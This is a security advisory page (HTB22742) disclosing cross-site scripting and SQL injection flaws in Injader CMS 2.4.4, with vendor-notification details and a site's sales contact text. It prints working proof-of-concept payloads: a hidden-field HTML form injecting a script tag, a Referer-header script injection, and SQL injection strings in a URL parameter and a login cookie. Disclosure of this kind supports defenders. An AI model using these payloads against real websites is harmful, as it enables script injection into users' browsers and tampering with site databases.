Total Tests:

Multiple Vulnerabilities in Injader CMS

Advisory ID:HTB22742
Product:Injader CMS
Vendor:Injader CMS Team
Vulnerable Versions:2.4.4 and probably prior
Tested Version:2.4.4
Advisory Publication:December 7, 2010 [without technical details]
Vendor Notification:December 7, 2010
Public Disclosure:December 21, 2010
Vulnerability Type:Cross-Site Scripting [CWE-79]
SQL Injection [CWE-89]
Risk Level:High
CVSSv2 Base Scores:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Injader CMS which could be exploited to perform cross-site scripting and SQL injection attacks.

1) Cross-site scripting (XSS) vulnerabilities in Injader CMS
1.1 The vulnerability exists due to input sanitation error in the "txtGuestURL" parameter in comment.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
<form action="http://host/comment.php?action=create&area=1" method="post" name="main" >
<input type="hidden" name="txtGuestName" value="test"/>
<input type="hidden" name="txtGuestEmail" value="test@mail.com"/>
<input type="hidden" name="chkPreview" value="on"/>
<input type="hidden" name="txtContent" value="test"/>
<input type="hidden" name="txtArticleID" value="1"/>
<input type="hidden" name="txtGuestURL" value='http://123.com"><script>alert("XSS");</script>'/>
<input type="submit" value="submit" name="submit" />
</form>

1.2 The vulnerability exists due to input sanitation error in the HTTP Referer header in login.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
GET /login.php HTTP/1.1
Referer: "><script>alert('XSS');</script>


2) SQL injection vulnerabilities in Injader CMS
2.1 The vulnerability exists due to input sanitation errors in the "area1" parameter in search.p. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://[host]/search.php?go=yes&q=a&area1=123%27SQL_CODE
2.2 The vulnerability exists due to input sanitation errors in the "IJ-Login" cookie in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
GET /index.php HTTP/1.1
Cookie: IJ-Login=123'SQL_CODE_HERE

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB22742 - https://www.immuniweb.com/advisory/HTB22742 - Multiple Vulnerabilities in Injader CMS
[2] Injader CMS - injader.com - Injader CMS is a content management system written in PHP.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential